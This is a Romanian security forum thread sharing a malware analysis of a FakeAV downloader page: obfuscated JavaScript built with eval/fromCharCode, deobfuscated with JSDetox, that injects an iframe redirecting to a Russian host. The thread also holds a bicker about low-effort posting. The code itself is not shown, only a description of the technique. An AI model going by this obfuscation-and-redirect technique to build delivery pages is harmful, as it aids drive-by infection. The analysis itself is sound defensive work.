Jump to content
Sign in to follow this  

Analysis Of Fake Antivirus Malware Delivery

Recommended Posts


1. Thanks for the sample file(s)

2. First view

3. Second view

4. More

Read more: http://dl.packetstormsecurity.net/papers/virus/fakeav-downloader-analysis.pdf

WTF man ... hai ca incep sa le dau dreptate astora care spun ca postezi sa te afli bagat in seama. Ce cacat de topic e asta cu 4 randuri in el ?

Pune si tu un intel basic despre subiectul pe care-l prezinti, ce-ai facut tu acum e bataie de joc, dupa cum vad eu.

No offence, dar e prea de tot.

E ca si cum ar aparea o strie despre cartofi cu branza si in loc sa va povestesc aici, fac un topic cu:

1. Du-te pe google.ro

2. Scrii cartofi cu branza

3. Citesti stirea de pe timpul.md.


Edited by AGSQ

Share this post

Link to post
Share on other sites

@AGSQ apropo daca citeai articolul vedeai ca nu e o stire :) + e un document .PDF nu stateam sa fac screen doar pentru a putea tu sa citesti articolul pe rst fara sa dai click pe link. ( incearca sa nu postezi doar ca sa te afli in treaba. )

Edited by Aerosol

Share this post

Link to post
Share on other sites
@AGSQ eu am pus link-ul pentru cine e interesat.

Daca nu te intereseaza te rog sa nu comentezi.


Omule, esti copac ?

Ideea de a posta ceva, de a share-ui ceva cu userii de pe forum este sa le dai cat mai multe informatii despre lucrul ala.

Iti era greu sa dai un copy-paste la ce e in PDF-ul ala, iar apoi sa aranjezi post-ul frumos cu imaginile respective ?

Nu vreau sa o iei personal, la urma urmei n-am nimic cu tine, poti sa crapi maine ca n-o sa incep sa plang dupa tine, dar ideea era ca faci posturi de-ampulea doar ca sa fie la numar.

Ofera informatii daca ai de oferit, daca nu abtine-te. Este destul de urat si deranjant, mai ales pentru cei care avem RSS activ.

PS: O gluma destul de buna:


Share this post

Link to post
Share on other sites

1. Thanks for the sample file(s)

After writing my last article about malware analysis for Android[1], I decide to check some threats that may come from

webpages. Today we can see more advertisement on web than it was few years ago. In case of malicious pages,

“advertisements” added there now, more often probably will try to steal your data by installing some malware on your

computer or by redirecting you to webpage containing exploit code for your browser(‘s plugin).

Few nice examples of ‘webpages’ like this, I found (again) on great Mila’s blog[0]. Thank’s again! ;)

(Hint: Don’t ask me for the password. Ask Mila via email.)

Let’s check the first one archive with HTML file, named “FakeAV Downloader”.

2. First View

After unpacking our HTML sample, we can see that index.html file contains HTML and JavaScript code


Let’s copy the JavaScript code to new file, and save it as “ob1.html”. Now we can clean the code a little bit to see what

is going on here:


As you can see, JS code is preparing “eval()” and “fromCharCode()” to use it later (with “n”):


3. Second view

When I was trying to figure out how to deobfuscate this code, I found a link to very nice tool called JSDetox[2]. You can

install it on Kali[4], but if there will be any problem with installation by “bundler”, try to install each packet manually

(gem). It should helps.


After uploading our sample index.html to JSDetox, we can start deobfuscation (“Analyse”) and get the results in few



Now we can see where new created <iframe> tag is trying to relocate us – iframe page is located on:


Unfortunately, when I was checking this code, RU hostname was unavailable.


After that, I found some other interesting informations, for example:

a) Correlation network topology[3]


B) This host was used for: [5]


c) and one more information:


So it seems now, that we have all information we need to decide that this index.html file (used in phishing campany for

example) can be very dangerous for safety of our users/clients.

4. More

Again big thanks for the sample files! ;)

If you have more, post the link(s) on comments or send me the email with subject “MALWARE”. Please remember to

pack it with password ‘infected’ (zip/rar/whatever). (Without the password, email server will drop them.)

Materials described here:


Special pentru domnul @AGSQ care nu putea sa dea pe un link.

Imi pare rau domnule ca mi-am permis sa pun link-ul pentru a salva 5 minute de facut screen-uri + alte 10 de editat...

Sper ca acum ai inteles mai bine acest articol ( desi ma indoiesc sa fi inteles. :)) )

Edited by Aerosol

Share this post

Link to post
Share on other sites

Nu e vorba de salvatul timpului ci de ajutatul comunitatii. Atat pentru membrii existenti, cat si pentru cei noi, care au mai multe sanse sa gaseasca forumul dintr-un tag cloud de 500 cuvinte, in locul a 10 cuvinte.

Ultimul reply.

Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Create New...